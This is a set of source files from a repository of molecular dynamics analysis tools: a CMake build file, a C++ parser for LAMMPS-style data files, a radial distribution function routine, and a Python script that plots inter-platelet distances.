"alphanum_fraction": 0.6236044764518738,
"avg_line_length": 19.225807189941406,
"blob_id": "ea27f5db015ccc5e9118b5b336965512601a5666",
"content_id": "39c630574495c05e97e7456a4b2b24918225658e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "CMake",
"length_bytes": 1254,
"license_type": "no_license",
"max_line_length": 81,
"num_lines": 62,
"path": "/CMakeLists.txt",
"repo_name": "ansko/cpp_dpd_analyzers",
"src_encoding": "UTF-8",
"text": "cmake_minimum_required (VERSION 2.6) \n \n\nset (PROJECT dpd_tools) \n\n\nproject (${PROJECT}) \n\nset(THREADS_PREFER_PTHREAD_FLAG ON)\nfind_package(Threads REQUIRED)\n\n\n# CMAKE_CXX_FLAGS:\n#\n# -std=c++17\n#\n# -g0 no debug information\n# -g1 minimal debug information\n# -g default debug information\n# -g3 maximal debug information\n#\n# -lm link math library\n#\n# -DMACRO define MACRO:\n# DETAILED_OUTPUT print a lot of log information\n# GENERAL_OUTPUT print only main information\n# PARTIAL_DATAFILES write out some incomplete datafiles (for debug mainly)\n\n\nif (CMAKE_COMPILER_IS_GNUCXX)\n set(CMAKE_CXX_FLAGS \"${CMAKE_CXX_FLAGS}\\\n -Werror \\\n -std=c++17 \\\n -g \\\n -lm \\\n -O3 \\\n -DDETAILED_OUTPUT \\\n -DGENERAL_OUTPUT \\\n \")\nendif (CMAKE_COMPILER_IS_GNUCXX)\n\n\nset (HEADERS\n src/char_py_string.hpp\n src/datafile_content.hpp\n src/get_fnames.hpp\n src/perform_seria.hpp\n src/platelets_distance.hpp\n src/structures.hpp\n\n src/get_rdf.hpp\n)\n\nset (SOURCES\n src/platelets_distance.cpp\n src/get_rdf.cpp\n)\n\n\nadd_executable (test_exe ${HEADERS} ${SOURCES} main.cpp)\n\nadd_executable (rdf_exe ${HEADERS} ${SOURCES} rdf.cpp)\n"
},
{
"alpha_fraction": 0.5048797726631165,
"alphanum_fraction": 0.5120767951011658,
"avg_line_length": 40.49547576904297,
"blob_id": "3e85b67a0738d75050884910a641fbb3677c3ef7",
"content_id": "ceee376fa481411b6905fab6f59c960a7bf99a25",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 18341,
"license_type": "no_license",
"max_line_length": 83,
"num_lines": 442,
"path": "/src/datafile_content.hpp",
"repo_name": "ansko/cpp_dpd_analyzers",
"src_encoding": "UTF-8",
"text": "#ifndef DATAFILE_CONTENT_HPP\n#define DATAFILE_CONTENT_HPP\n\n\n#include <cstdlib>\n#include <cstdio>\n\n#include <array>\n#include <fstream>\n#include <iostream>\n#include <map>\n#include <string>\n#include <sstream>\n#include <tuple>\n#include <vector>\n\n#include \"structures.hpp\"\n#include \"char_py_string.hpp\"\n\n\n// Container for datafile reading\nclass DatafileContent\n{\npublic:\n DatafileContent(std::string fname)\n : _fname(fname), _atoms(nullptr), _velocities(nullptr), _bonds(nullptr),\n _angles(nullptr), _dihedrals(nullptr), _impropers(nullptr), _masses(nullptr),\n _pair_coeffs(nullptr), _bond_coeffs(nullptr), _angle_coeffs(nullptr),\n _dihedral_coeffs(nullptr), _improper_coeffs(nullptr)\n {\n this->read_datafile();\n }\n\n ~DatafileContent()\n {\n if (this->_atoms != nullptr)\n free(this->_atoms);\n if (this->_velocities != nullptr)\n free(this->_velocities);\n if (this->_bonds != nullptr)\n free(this->_bonds);\n if (this->_angles != nullptr)\n free(this->_angles);\n if (this->_dihedrals != nullptr)\n free(this->_dihedrals);\n if (this->_impropers != nullptr)\n free(this->_impropers);\n if (this->_masses != nullptr)\n free(this->_masses);\n if (this->_pair_coeffs != nullptr)\n free(this->_pair_coeffs);\n if (this->_bond_coeffs != nullptr)\n free(this->_bond_coeffs);\n if (this->_angle_coeffs != nullptr)\n free(this->_angle_coeffs);\n if (this->_dihedral_coeffs != nullptr)\n free(this->_dihedral_coeffs);\n if (this->_improper_coeffs != nullptr)\n free(this->_improper_coeffs);\n }\n\n const Atom *atoms() const { return this->_atoms; }\n const Bond *bonds() const { return this->_bonds; }\n const Angle *angles() const { return this->_angles; }\n const Dihedral *dihedrals() const { return this->_dihedrals; }\n const Improper *impropers() const { return this->_impropers; }\n\n const std::string fname() const { return this->_fname; }\n const std::string comment() const { return this->_comment; }\n const unsigned int atoms_count() const { return this->_atoms_count; }\n const unsigned int atom_types() const { return this->_atom_types; }\n const std::tuple<float, float, float>* velocities() const\n { return this->_velocities; }\n const unsigned int bonds_count() const { return this->_bonds_count; }\n const unsigned int bond_types() const { return this->_bond_types; }\n const unsigned int angles_count() const { return this->_angles_count; }\n const unsigned int angle_types() const { return this->_angle_types; }\n const unsigned int dihedrals_count() const { return this->_dihedrals_count; }\n const unsigned int dihedral_types() const { return this->_dihedral_types; }\n const unsigned int impropers_count() const { return this->_impropers_count; }\n const unsigned int improper_types() const { return this->_improper_types; }\n const float xlo() const { return this->_xlo; }\n const float xhi() const { return this->_xhi; }\n const float ylo() const { return this->_ylo; }\n const float yhi() const { return this->_yhi; }\n const float zlo() const { return this->_zlo; }\n const float zhi() const { return this->_zhi; }\n const float xy() const { return this->_xy; }\n const float xz() const { return this->_xz; }\n const float yz() const { return this->_yz; }\n const float *masses() const { return this->_masses; }\n const std::tuple<float, float>* pair_coeffs() const\n { return this->_pair_coeffs; }\n const std::tuple<float, float>* bond_coeffs() const\n { return this->_bond_coeffs; }\n const std::tuple<float, float>* angle_coeffs() const\n { return this->_angle_coeffs; }\n const 
std::tuple<float, int, int>* dihedral_coeffs() const\n { return this->_dihedral_coeffs; }\n const std::tuple<float, int, int>* improper_coeffs() const\n { return this->_improper_coeffs; }\n\n void read_datafile()\n {\n std::vector<CharPyString> lines;\n std::string buffer_line;\n unsigned int masses_idx = 0;\n unsigned int pair_coeffs_idx = 0;\n unsigned int bond_coeffs_idx = 0;\n unsigned int angle_coeffs_idx = 0;\n unsigned int dihedral_coeffs_idx = 0;\n unsigned int improper_coeffs_idx = 0;\n unsigned int atoms_idx = 0;\n unsigned int velocities_idx = 0;\n unsigned int bonds_idx = 0;\n unsigned int angles_idx = 0;\n unsigned int dihedrals_idx = 0;\n unsigned int impropers_idx = 0;\n\n // Reading lines in c-style is not faster as i think;\n // also, C getline produces lines with '\\n'\n std::ifstream ifs(this->_fname);\n while (std::getline(ifs, buffer_line))\n {\n lines.push_back(buffer_line.c_str());\n }\n\n for (size_t idx = 0; idx < lines.size(); ++idx)\n {\n if (lines[idx].endswith(\"atoms\"))\n this->_atoms_count = lines[idx].word_as_float(0);\n else if (lines[idx].endswith(\"bonds\"))\n this->_bonds_count = lines[idx].word_as_float(0);\n else if (lines[idx].endswith(\"angles\"))\n this->_angles_count = lines[idx].word_as_float(0);\n else if (lines[idx].endswith(\"dihedrals\"))\n this->_dihedrals_count = lines[idx].word_as_float(0);\n else if (lines[idx].endswith(\"impropers\"))\n this->_impropers_count = lines[idx].word_as_float(0);\n\n else if (lines[idx].endswith(\"atom types\"))\n this->_atom_types = lines[idx].word_as_float(0);\n else if (lines[idx].endswith(\"bond types\"))\n this->_bond_types = lines[idx].word_as_float(0);\n else if (lines[idx].endswith(\"angle types\"))\n this->_angle_types = lines[idx].word_as_float(0);\n else if (lines[idx].endswith(\"dihedral types\"))\n this->_dihedral_types = lines[idx].word_as_float(0);\n else if (lines[idx].endswith(\"improper types\"))\n this->_improper_types = lines[idx].word_as_float(0);\n\n else if (lines[idx].endswith(\"xlo xhi\"))\n {\n this->_xlo = lines[idx].word_as_float(0);\n this->_xhi = lines[idx].word_as_float(1);\n }\n else if (lines[idx].endswith(\"ylo yhi\"))\n {\n this->_ylo = lines[idx].word_as_float(0);\n this->_yhi = lines[idx].word_as_float(1);\n }\n else if (lines[idx].endswith(\"zlo zhi\"))\n {\n this->_zlo = lines[idx].word_as_float(0);\n this->_zhi = lines[idx].word_as_float(1);\n }\n else if (lines[idx].endswith(\"xy xz yz\"))\n {\n this->_xy = lines[idx].word_as_float(0);\n this->_xz = lines[idx].word_as_float(1);\n this->_yz = lines[idx].word_as_float(2);\n }\n\n else if (lines[idx].endswith(\"Masses\"))\n masses_idx = idx;\n else if (lines[idx].startswith(\"Pair Coeffs\"))\n pair_coeffs_idx = idx;\n else if (lines[idx].startswith(\"Bond Coeffs\"))\n bond_coeffs_idx = idx;\n else if (lines[idx].startswith(\"Angle Coeffs\"))\n angle_coeffs_idx = idx;\n else if (lines[idx].startswith(\"Dihedral Coeffs\"))\n dihedral_coeffs_idx = idx;\n else if (lines[idx].startswith(\"Improper Coeffs\"))\n improper_coeffs_idx = idx;\n else if (lines[idx].startswith(\"Atoms\"))\n atoms_idx = idx;\n else if (lines[idx].startswith(\"Velocities\"))\n velocities_idx = idx;\n else if (lines[idx].startswith(\"Bonds\"))\n bonds_idx = idx;\n else if (lines[idx].startswith(\"Angles\"))\n angles_idx = idx;\n else if (lines[idx].startswith(\"Dihedrals\"))\n dihedrals_idx = idx;\n else if (lines[idx].startswith(\"Impropers\"))\n impropers_idx = idx;\n }\n\n if (masses_idx)\n {\n this->_masses = (float *)malloc(\n sizeof(float) * 
(this->_atom_types + 1));\n\n auto first = lines.begin() + masses_idx + 2;\n auto last = lines.begin() + masses_idx + 2 + this->_atom_types;\n for (auto &it = first; it != last; ++it)\n {\n const unsigned int key(it->word_as_float(0));\n const float mass = it->word_as_float(1);\n this->_masses[key] = mass;\n }\n }\n\n if (pair_coeffs_idx)\n {\n typedef std::tuple<float, float> T;\n this->_pair_coeffs = (T *)malloc(\n sizeof(T) * (this->_atom_types + 1));\n auto first = lines.begin() + pair_coeffs_idx + 2;\n auto last = lines.begin() + pair_coeffs_idx + 2 + this->_atom_types;\n for (auto &it = first; it != last; ++it)\n {\n const unsigned int key(it->word_as_float(0));\n const float eps = it->word_as_float(1);\n const float sig = it->word_as_float(2);\n this->_pair_coeffs[key] = {eps, sig};\n }\n }\n\n if (bond_coeffs_idx)\n {\n typedef std::tuple<float, float> T;\n this->_bond_coeffs = (T *)malloc(\n sizeof(T) * (this->_bond_types + 1));\n auto first = lines.begin() + bond_coeffs_idx + 2;\n auto last = lines.begin() + bond_coeffs_idx + 2 + this->_bond_types;\n for (auto &it = first; it != last; ++it)\n {\n const unsigned int key(it->word_as_float(0));\n const float k = it->word_as_float(1);\n const float l = it->word_as_float(2);\n this->_bond_coeffs[key] = {k, l};\n }\n }\n\n if (angle_coeffs_idx)\n {\n typedef std::tuple<float, float> T;\n this->_angle_coeffs = (T *)malloc(\n sizeof(T) * (this->_angle_types + 1));\n auto first = lines.begin() + angle_coeffs_idx + 2;\n auto last = lines.begin() + angle_coeffs_idx + 2 + this->_angle_types;\n for (auto &it = first; it != last; ++it)\n {\n const unsigned int key(it->word_as_float(0));\n const float k = it->word_as_float(1);\n const float theta = it->word_as_float(2);\n this->_angle_coeffs[key] = {k, theta};\n }\n }\n\n if (dihedral_coeffs_idx)\n {\n typedef std::tuple<float, int, int> T;\n this->_dihedral_coeffs = (T *)malloc(\n sizeof(T) * (this->_dihedral_types + 1));\n auto first = lines.begin() + dihedral_coeffs_idx + 2;\n auto last = lines.begin() + dihedral_coeffs_idx + 2\n + this->_dihedral_types;\n for (auto &it = first; it != last; ++it)\n {\n const unsigned int key(it->word_as_float(0));\n const float k = it->word_as_float(1);\n const int d(it->word_as_float(2));\n const int n(it->word_as_float(3));\n this->_dihedral_coeffs[key] = {k, d, n};\n }\n }\n\n if (improper_coeffs_idx)\n {\n typedef std::tuple<float, int, int> T;\n this->_improper_coeffs = (T *)malloc(\n sizeof(T) * (this->_improper_types + 1));\n auto first = lines.begin() + improper_coeffs_idx + 2;\n auto last = lines.begin() + improper_coeffs_idx + 2\n + this->_improper_types;\n for (auto &it = first; it != last; ++it)\n {\n const unsigned int key(it->word_as_float(0));\n const float k = it->word_as_float(1);\n const int d(it->word_as_float(2));\n const int n(it->word_as_float(3));\n this->_improper_coeffs[key] = {k, d, n};\n }\n }\n\n {\n this->_atoms = (Atom *)malloc(sizeof(Atom) * (this->_atoms_count + 1));\n auto first = lines.begin() + atoms_idx + 2;\n auto last = lines.begin() + atoms_idx + 2 + this->_atoms_count;\n for (auto &it = first; it != last; ++it)\n {\n const int atom_id(it->word_as_float(0));\n const int molecule_tag(it->word_as_float(1));\n const int atom_type_id (it->word_as_float(2));\n const float q = (it->word_as_float(3));\n const float x = (it->word_as_float(4));\n const float y = (it->word_as_float(5));\n const float z = (it->word_as_float(6));\n const int nx(it->word_as_float(7));\n const int ny(it->word_as_float(8));\n const int 
nz(it->word_as_float(9));\n this->_atoms[atom_id] = Atom(atom_id, molecule_tag, atom_type_id,\n q, x, y, z, nx, ny, nz);\n }\n }\n\n if (velocities_idx)\n {\n typedef std::tuple<float, float, float> T;\n this->_velocities = (T *)malloc(sizeof(T) * (this->_atoms_count + 1));\n auto first = lines.begin() + velocities_idx + 2;\n auto last = lines.begin() + velocities_idx + 2 + this->_atoms_count;\n for (auto &it = first; it != last; ++it)\n {\n const size_t atom_id(it->word_as_float(0));\n const float vx = (it->word_as_float(1));\n const float vy = (it->word_as_float(2));\n const float vz = (it->word_as_float(3));\n std::array<float, 3> v{{vx, vy, vz}};\n }\n }\n\n if (bonds_idx)\n {\n this->_bonds = (Bond *)malloc(sizeof(Bond) * (this->_bonds_count + 1));\n auto first = lines.begin() + bonds_idx + 2;\n auto last = lines.begin() + bonds_idx + 2 + this->_bonds_count;\n for (auto &it = first; it != last; ++it)\n {\n \n const int bond_id(it->word_as_float(0));\n const int bond_type_id(it->word_as_float(1));\n const int atom_one_id(it->word_as_float(2));\n const int atom_two_id(it->word_as_float(3));\n this->_bonds[bond_id] = Bond(bond_id, bond_type_id,\n atom_one_id, atom_two_id);\n }\n }\n\n if (angles_idx)\n {\n this->_angles = (Angle *)malloc(sizeof(Angle)\n * (this->_angles_count + 1));\n auto first = lines.begin() + angles_idx + 2;\n auto last = lines.begin() + angles_idx + 2 + this->_angles_count;\n for (auto &it = first; it != last; ++it)\n {\n const int angle_id(it->word_as_float(0));\n const int angle_type_id(it->word_as_float(1));\n const int atom_one_id(it->word_as_float(2));\n const int atom_two_id(it->word_as_float(3));\n const int atom_three_id(it->word_as_float(4));\n this->_angles[angle_id] = Angle(angle_id, angle_type_id,\n atom_one_id, atom_two_id, atom_three_id);\n }\n }\n\n if (dihedrals_idx)\n {\n this->_dihedrals = (Dihedral *)malloc(sizeof(Dihedral)\n * (this->_dihedrals_count + 1));\n auto first = lines.begin() + dihedrals_idx + 2;\n auto last = lines.begin() + dihedrals_idx + 2 + this->_dihedrals_count;\n for (auto &it = first; it != last; ++it)\n {\n const int dihedral_id(it->word_as_float(0));\n const int dihedral_type_id(it->word_as_float(1));\n const int atom_one_id(it->word_as_float(2));\n const int atom_two_id(it->word_as_float(3));\n const int atom_three_id(it->word_as_float(4));\n const int atom_four_id(it->word_as_float(5));\n this->_dihedrals[dihedral_id] = Dihedral(\n dihedral_id, dihedral_type_id,\n atom_one_id, atom_two_id, atom_three_id, atom_four_id);\n }\n }\n\n if (impropers_idx)\n {\n this->_impropers = (Improper *)malloc(sizeof(Improper)\n * (this->_impropers_count + 1));\n auto first = lines.begin() + impropers_idx + 2;\n auto last = lines.begin() + impropers_idx + 2 + this->_impropers_count;\n for (auto &it = first; it != last; ++it)\n {\n const int improper_id(it->word_as_float(0));\n const int improper_type_id(it->word_as_float(1));\n const int atom_one_id(it->word_as_float(2));\n const int atom_two_id(it->word_as_float(3));\n const int atom_three_id(it->word_as_float(4));\n const int atom_four_id(it->word_as_float(5));\n this->_impropers[improper_id] = Improper(\n improper_id, improper_type_id,\n atom_one_id, atom_two_id, atom_three_id, atom_four_id);\n }\n }\n }\n\nprivate:\n std::string _fname;\n std::string _comment;\n Atom* _atoms;\n unsigned int _atoms_count;\n unsigned int _atom_types;\n std::tuple<float, float, float>* _velocities;\n Bond* _bonds;\n unsigned int _bonds_count;\n unsigned int _bond_types;\n Angle* _angles;\n unsigned int 
_angles_count;\n unsigned int _angle_types;\n Dihedral* _dihedrals;\n unsigned int _dihedrals_count;\n unsigned int _dihedral_types;\n Improper* _impropers;\n unsigned int _impropers_count;\n unsigned int _improper_types;\n float _xlo = 0, _xhi = 0, _ylo = 0, _yhi = 0, _zlo = 0, _zhi = 0;\n float _xy = 0, _xz = 0, _yz = 0;\n float *_masses;\n std::tuple<float, float>* _pair_coeffs;\n std::tuple<float, float>* _bond_coeffs;\n std::tuple<float, float>* _angle_coeffs;\n std::tuple<float, int, int>* _dihedral_coeffs;\n std::tuple<float, int, int>* _improper_coeffs;\n};\n\n\n#endif // DATAFILE_CONTENT_HPP include guard\n"
},
{
"alpha_fraction": 0.4871987998485565,
"alphanum_fraction": 0.5225903391838074,
"avg_line_length": 27.255319595336914,
"blob_id": "06c3262db67f27f431d74381a268f0b006d1f4ea",
"content_id": "e57cc1ee3b7dd0812cd5e7ee724ee00ff17e298a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2794,
"license_type": "no_license",
"max_line_length": 77,
"num_lines": 94,
"path": "/plot_seria.py",
"repo_name": "ansko/cpp_dpd_analyzers",
"src_encoding": "UTF-8",
"text": "# Originates from:\n# https://github.com/ansko/dpd_analyzers\n# /commit/???\n# /plot_mmt_distance.py\n\n'''\nThis is a toll to compare exfoliation tempos.\n'''\n\n\nimport math\nimport random\nimport sys\n\nimport matplotlib as mpl\nimport matplotlib.pyplot as plt\n\n\nif __name__ == '__main__':\n regime = sys.argv[1]\n\n title = ''\n fnames = []\n legends = []\n ylims = []\n\n if regime == 'poly_mod_likeness':\n title = 'Полимер и хвост модификатора отталкиваются слабо'\n fnames = ['outs/' + regime + \"_\" + str(idx) for idx in range(4)]\n legends = [\n '100, ave', '100, closest',\n '200, ave', '200, closest',\n '300, ave', '300, closest',\n '400, ave', '400, closest'\n ]\n ylims = [0, 5]\n elif regime == 'article_params':\n title = 'Параметры из статей итальянцев'\n fnames = ['outs/' + regime + \"_\" + str(idx) for idx in range(4)]\n legends = [\n '100, ave', '100, closest',\n '200, ave', '200, closest',\n '300, ave', '300, closest',\n '400, ave', '400, closest'\n ]\n ylims = [0, 5]\n elif regime == 'npt_attraction':\n title = ('Полимер и хвост модификатора отталкиваются слабо'\n '\\nно (a_ij большие)')\n fnames = ['outs/' + regime + \"_\" + str(idx) for idx in range(4)]\n legends = [\n '100, ave', '100, closest',\n '200, ave', '200, closest',\n '300, ave', '300, closest',\n '400, ave', '400, closest'\n ]\n ylims = [0, 5]\n\n else:\n raise NotImplemented\n\n xlabel = r'Время, k$\\tau$'\n ylabel = r'Расстояние в $r_c$ ($r_c$ = 5.23$\\AA$)'\n out_fname = regime + '.pdf'\n\n colors = list('rgbk')\n plotted_lines = []\n for idx, fname in enumerate(fnames):\n xs = []\n ys = []\n ys2 = []\n for line in open(fname).readlines():\n xs.append(float(line.split()[0]))\n ys.append(float(line.split()[1]))\n try:\n ys2.append(float(line.split()[2]))\n except IndexError:\n pass\n color = random.choice(colors)\n colors.pop(colors.index(color))\n new_line, = plt.plot(xs, ys, color, label=legends[idx], linewidth=3)\n plotted_lines.append(new_line)\n new_line, = plt.plot(xs, ys2, color, label=legends[idx], linewidth=1)\n plotted_lines.append(new_line)\n \n\n plt.title(title)\n plt.gca().set_ylim(ylims)\n plt.xlabel(xlabel)\n plt.ylabel(ylabel)\n plt.legend(plotted_lines, legends, fontsize=8)\n plt.savefig(out_fname)\n\n print('Successful finish for', regime)\n"
},
{
"alpha_fraction": 0.7245901823043823,
"alphanum_fraction": 0.7245901823043823,
"avg_line_length": 15.94444465637207,
"blob_id": "5a5a43a2209b93f83e5148f4190703ebfe8cb976",
"content_id": "23094215d70f8316a0802587a891982829ec9631",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 305,
"license_type": "no_license",
"max_line_length": 68,
"num_lines": 18,
"path": "/src/get_rdf.hpp",
"repo_name": "ansko/cpp_dpd_analyzers",
"src_encoding": "UTF-8",
"text": "#ifndef GET_RDF_HPP\n#define GET_RDF_HPP\n\n\n#include <algorithm>\n#include <cmath>\n#include <map>\n#include <vector>\n\n#include \"datafile_content.hpp\"\n#include \"structures.hpp\"\n\n\nstd::map<float, float>\nget_rdf(DatafileContent &dfc, std::vector<unsigned int> atom_types);\n\n\n#endif // GET_RDF_HPP include guard\n"
},
{
"alpha_fraction": 0.4315861165523529,
"alphanum_fraction": 0.4349897801876068,
"avg_line_length": 27.25,
"blob_id": "a0dc83c00b3629be58c4b84b169ed7aaa1467bdd",
"content_id": "431ffe1ff947cb8fff9a0ee825b045ea76d5d9bb",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 1469,
"license_type": "no_license",
"max_line_length": 80,
"num_lines": 52,
"path": "/src/get_rdf.cpp",
"repo_name": "ansko/cpp_dpd_analyzers",
"src_encoding": "UTF-8",
"text": "#include \"get_rdf.hpp\"\n\n\nstd::map<float, float>\nget_rdf(DatafileContent &dfc, std::vector<unsigned int> atom_types)\n{\n std::map<float, float> result;\n\n const Atom *atoms = dfc.atoms();\n const unsigned int atoms_count = dfc.atoms_count();\n\n float lx(dfc.xhi() - dfc.xlo());\n float ly(dfc.yhi() - dfc.ylo());\n float lz(dfc.zhi() - dfc.zlo());\n\n for (unsigned int i = 1; i < atoms_count + 1; ++i)\n {\n if (std::find(atom_types.begin(), atom_types.end(), atoms[i].type())\n == atom_types.end())\n {\n continue;\n }\n for (unsigned int j = i + 1; j < atoms_count; ++j)\n {\n if (std::find(atom_types.begin(), atom_types.end(), atoms[j].type())\n == atom_types.end())\n {\n continue;\n }\n\n float dx(std::fabs(atoms[i].x() - atoms[j].x()));\n float dy(std::fabs(atoms[i].y() - atoms[j].y()));\n float dz(std::fabs(atoms[i].z() - atoms[j].z()));\n dx = std::min(dx, lx - dx);\n dy = std::min(dy, ly - dy);\n dz = std::min(dz, lz - dz);\n float dr(sqrt(dx*dx + dy*dy + dz*dz));\n\n dr = float(int(dr));\n if (result.find(dr) == result.end())\n {\n result[dr] = 1 / dr/dr;\n }\n else\n {\n result[dr] += 1/dr/dr;\n }\n }\n }\n\n return result;\n}\n"
}
] | 14 |
balhayer/Best-File-Search | https://github.com/balhayer/Best-File-Search | 0b6d2c24d00449260dba87434ee300a61f974366 | ff8747c4c24e964316b7f7a1bec261c9cc9af1e8 | 6da11326e2fce393b34bb0d5fe90698333a6d8f3 | refs/heads/master | 2022-12-08T22:39:16.287109 | 2020-08-29T21:03:01 | 2020-08-29T21:03:01 | 291,347,190 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.5285079479217529,
"alphanum_fraction": 0.5423917174339294,
"avg_line_length": 35.24827575683594,
"blob_id": "b6831f6541cd10ed3240e135511e45dfd0dca9c9",
"content_id": "381bac1e0d6275e968a03bb9165bac970d6cdb41",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 10804,
"license_type": "no_license",
"max_line_length": 159,
"num_lines": 290,
"path": "/Best-File-Search-master/Best File Search/Best File Search.py",
"repo_name": "balhayer/Best-File-Search",
"src_encoding": "UTF-8",
"text": "import os\r\nimport tkinter\r\nfrom tkinter import *\r\nfrom PyPDF2 import PdfFileReader #PDF\r\nimport comtypes.client #DOCX\r\nimport win32api # install pypiwin32, PyMuPDF, python-pptx, python-docx\r\nfrom docx import Document\r\nfrom docx.enum.text import WD_COLOR_INDEX\r\nfrom pptx import Presentation\r\nimport xlsxwriter #EXCEL\r\nfrom xlsxwriter.utility import xl_rowcol_to_cell\r\nimport xlrd\r\nimport fitz # PDF\r\n\r\n\r\ndef init(window):\r\n window.title(\"Best File Search\")\r\n window.geometry(\"700x640\")\r\n window.resizable(False, False)\r\n\r\n # Configure Widgets\r\n frame.place(x=300, y=78) # set for fileList(Listbox) scrollbar\r\n frame2.place(x=300, y=412)\r\n scrollbar.configure(command=fileList.yview)\r\n fileList.configure(yscrollcommand=scrollbar.set)\r\n scrollbar2.configure(command=fileList.yview)\r\n openedFileList.configure(yscrollcommand=scrollbar.set)\r\n backgroundlabel.configure(image=backgroundimage)\r\n bClear.configure(command=buttonClear)\r\n bOpen.configure(command=buttonOpen)\r\n btnSearch.configure(command=executeSearchButton)\r\n bClearTwo.configure(command=buttonClearTwo)\r\n # Place Widgets\r\n # labelsearchtext.place(x=40, y=80)\r\n # labledesiredpath.place(x=40, y=230)\r\n desiredpath.place(x=130, y=250)\r\n searchText.place(x=41, y=125)\r\n # searchedFileName.place(x=300, y=30)\r\n # openedFileName.place(x=300, y=380)\r\n btnSearch.place(x=170, y=110, width=50, height=50)\r\n bClear.place(x=620, y=385, width=50, height=20)\r\n bClearTwo.place(x=565,y=50, width=50, height=20)\r\n bOpen.place(x=620, y=50, width=50, height=20)\r\n\r\ndef buttonClear():\r\n openedFileList.delete(0, END)\r\n\r\ndef buttonClearTwo():\r\n fileList.delete(0, END)\r\n\r\ndef buttonOpen():\r\n value = fileList.get(fileList.curselection()[0])\r\n #os.startfile(value)\r\n\r\n searchInput = searchText.get()\r\n\r\n ext = os.path.splitext(value)[-1]\r\n pathExceptExt = os.path.splitext(value)[0]\r\n\r\n if ext == \".pptx\":\r\n powerpoint = comtypes.client.CreateObject(\"Powerpoint.Application\")\r\n powerpoint.Visible = 1\r\n\r\n Filename = value\r\n deck = powerpoint.Presentations.Open(Filename)\r\n deck.SaveAs(pathExceptExt + \".pdf\", 32) # formatType = 32 for ppt to pdf\r\n\r\n value2 = pathExceptExt + \".pdf\"\r\n doc = fitz.open(value2)\r\n pdf = PdfFileReader(value2)\r\n saveNumPages = pdf.getNumPages()\r\n\r\n for i in range(saveNumPages):\r\n page = doc[i]\r\n text_instances = page.searchFor(searchInput)\r\n\r\n for inst in text_instances:\r\n highlight = page.addHighlightAnnot(inst)\r\n doc.save(pathExceptExt + \"_modified.pdf\", garbage=4, deflate=True, clean=True)\r\n os.startfile(pathExceptExt + \"_modified.pdf\")\r\n\r\n elif ext == \".txt\":\r\n with open(value, mode='r', encoding='utf-8') as fo:\r\n textthis = fo.read()\r\n\r\n with open(pathExceptExt + \".html\", \"w\") as e:\r\n if searchInput in textthis:\r\n e.write(\"<pre>\" + textthis.replace(searchInput, '<span style=\"background-color: #FFFF00\">{}</span>'.format(\r\n searchInput)) + \"</pre> <br>\\n\")\r\n os.startfile(pathExceptExt + \".html\")\r\n elif ext == \".xlsx\":\r\n\r\n wbk = xlsxwriter.Workbook(value)\r\n wks = wbk.add_worksheet()\r\n myPath = value\r\n\r\n cell_format = wbk.add_format()\r\n cell_format.set_bg_color('yellow')\r\n for sh in xlrd.open_workbook(myPath).sheets():\r\n for row in range(sh.nrows):\r\n for col in range(sh.ncols):\r\n mycell = sh.cell(row, col)\r\n if mycell.value == searchInput:\r\n wks.write(xl_rowcol_to_cell(row, col), searchInput, cell_format)\r\n 
else:\r\n wks.write(xl_rowcol_to_cell(row, col), mycell.value)\r\n wbk.close()\r\n os.startfile(value)\r\n elif ext == \".docx\":\r\n document = Document(value)\r\n\r\n for para in document.paragraphs:\r\n start = para.text.find(searchInput)\r\n if start > -1:\r\n pre = para.text[:start]\r\n post = para.text[start + len(searchInput):]\r\n para.text = pre\r\n para.add_run(searchInput)\r\n para.runs[1].font.highlight_color = WD_COLOR_INDEX.YELLOW\r\n para.add_run(post)\r\n document.save(pathExceptExt + \"_modified.docx\")\r\n os.startfile(pathExceptExt + \"_modified.docx\")\r\n\r\n elif ext == \".pdf\":\r\n\r\n doc = fitz.open(value)\r\n for i in range(10):\r\n try:\r\n page = doc[i]\r\n\r\n text_instances = page.searchFor(searchInput)\r\n\r\n for inst in text_instances:\r\n highlight = page.addHighlightAnnot(inst)\r\n\r\n except IndexError:\r\n break\r\n doc.save(pathExceptExt + \"_mod.pdf\", garbage=4, deflate=True, clean=True)\r\n os.startfile(pathExceptExt + \"_mod.pdf\")\r\n\r\n openedFileList.insert(END, value)\r\n\r\n# Determine whether there are specific strings in some files such as .txt, .docx, .pptx files\r\n# then insert their path and name to the list\r\ndef searchDir(root_folder, searchInput):\r\n\r\n #exceptFolderList = [ \"AppData\", \"WINDOWS\", \"Windows\", \"Program Files (x86)\", \"Program Files\"]\r\n\r\n try:\r\n filenames = os.listdir(root_folder)\r\n\r\n for filename in filenames:\r\n full_filename = os.path.join(root_folder, filename)\r\n\r\n if os.path.isdir(full_filename):\r\n if filename == \"AppData\" or filename == \"WINDOWS\" or filename == \"Windows\" or filename == \"Program Files (x86)\" or filename == \"Program Files\":\r\n pass\r\n else:\r\n searchDir(full_filename, searchInput)\r\n\r\n else:\r\n ext = os.path.splitext(full_filename)[-1]\r\n #Search TXT files\r\n if ext == \".pdf\":\r\n try:\r\n doc = fitz.open(full_filename)\r\n page = doc[0]\r\n text_instances = page.searchFor(searchInput)\r\n if text_instances:\r\n print(full_filename)\r\n fileList.insert(END, full_filename)\r\n break\r\n except:\r\n pass\r\n\r\n elif ext == \".txt\":\r\n try:\r\n fo = open(full_filename, 'r', encoding='utf-8', errors='ignore')\r\n\r\n if searchInput in fo.read():\r\n print(full_filename)\r\n fileList.insert(END, full_filename)\r\n break\r\n except:\r\n pass\r\n\r\n elif ext == \".docx\":\r\n try:\r\n print(full_filename)\r\n document = Document(full_filename)\r\n\r\n for para in document.paragraphs:\r\n if searchInput in para.text:\r\n fileList.insert(END, full_filename)\r\n break\r\n except:\r\n pass\r\n elif ext == \".xlsx\":\r\n try:\r\n print(full_filename)\r\n wbk = xlsxwriter.Workbook(full_filename)\r\n wks = wbk.add_worksheet()\r\n\r\n myPath = full_filename\r\n for sh in xlrd.open_workbook(myPath).sheets():\r\n for row in range(sh.nrows):\r\n for col in range(sh.ncols):\r\n myCell = sh.cell(row, 